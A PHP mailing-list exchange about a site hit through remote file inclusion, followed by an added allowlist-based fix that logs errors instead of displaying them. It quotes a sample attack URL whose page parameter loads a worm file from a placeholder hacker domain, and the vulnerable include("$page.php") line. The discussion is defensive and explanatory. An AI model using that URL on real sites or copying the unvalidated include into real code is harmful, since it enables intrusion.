Stut wrote:
> Seak, Teng-Fong wrote:
>> But after I've spent some time reading the log files, I've finally
>> found out how the hackers managed to achieve worm infiltration.
>>
>> Actually, they're using a URL like this:
>> http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-file.txt?
>>
>> And the some-worm-file.txt file contains some PHP code, while my
>> index.php contains this instruction:
>> include("$page.php");
>>
>> This is enough to make infiltration possible! IMO, this instruction
>> is supposed to be used like this, isn't it? So this is obviously a PHP
>> security loophole and I don't see how the "poorly written scripts" can
>> help anything unless a total rewrite! And there's no "poor server
>> security" that I can see.
>
> You mean to say that you're not validating what you're getting from
> the user? Frankly you deserve everything you get.

No, I don't deserve anything because, as I've written in the original post (but I suppose you didn't notice), the website is outsourced and made by a 3rd company. I had already spent a lot of time to learn and understand PHP, which normally isn't a part of my job. So, I had already done more than I should.

> This is *not* a "security loophole", it *is* a poorly written script.

Well, when something doesn't produce the expected effect/result, or produces a side effect, it's considered a bug. If that's not a bug, why would the behaviour be changed from PHP4 to PHP5 then?

>> I've installed PHP5 and the problem seems fixed. However, PHP
>> writes out where the problem occurs! Indeed, the hacker could read a
>> line like this:
>> Warning: include() [function.include]: URL file-access is disabled in
>> the server configuration in
>> C:\Inetpub\wwwroot\index.php on line X
>>
>> I don't want them (the hackers) to be able to read this either.
>> That gives too much information about my server's file system. How can
>> I stop that?
>
> Read the manual, specifically the error_reporting part. You can turn
> the display of these messages off.

I had. Well, I had tried to do so, spending time out of my tightly scheduled job planning.

>> By the way, I know there're still a lot of servers out there still
>> using PHP4. Is this vulnerability a known bug? At least, I'm not aware
>> of that before!
>
> It's not a bug. It will never be a bug. Yes PHP5 (I believe it's 5.2+)
> introduces the ability to turn off the ability to prevent this issue,
> but it's still badly written code. Stop blaming the tool, start
> blaming the mirror image and start learning how to code defensively.
>
> -Stut

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
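
An added example, not part of the thread and not code from the site being discussed: one way to write the `include` so that the `page` parameter is checked against an allowlist and PHP warnings are logged instead of shown to the visitor. The page names, the `pages/` directory and the `resolve_page()` helper are assumptions made for illustration.

```php
<?php
// Added example (uses PHP 7.1+ syntax). Page names, the pages/ directory
// and resolve_page() are hypothetical, not taken from the thread.

// Keep warnings, which reveal paths such as C:\Inetpub\wwwroot\..., out of
// the HTTP response and write them to the server's error log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Server-wide settings belong in php.ini, not in the script:
//   allow_url_include = Off   (available since PHP 5.2.0)
//   allow_url_fopen   = Off   (if the site never opens remote URLs)
// With either one off, include() of an http:// URL fails.

// Fixed map from the public "page" value to a local file. The request value
// is only ever used as a lookup key, never as part of a path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Return the local file for a requested page, or null when the value is
 * not on the allowlist (a URL, a "../" path, an array, an unknown name).
 */
function resolve_page($requested, string $baseDir): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return $baseDir . '/' . PAGES[$requested];
}

$page = $_GET['page'] ?? 'home';
$file = resolve_page($page, __DIR__ . '/pages');

if ($file === null || !is_file($file)) {
    // Same generic response for every rejected value; nothing is echoed back.
    http_response_code(404);
    exit('Page not found');
}

include $file;
```

With this in place, the request shape quoted in the message (`page=http://...`) never reaches `include`, because the value is not a key in the map.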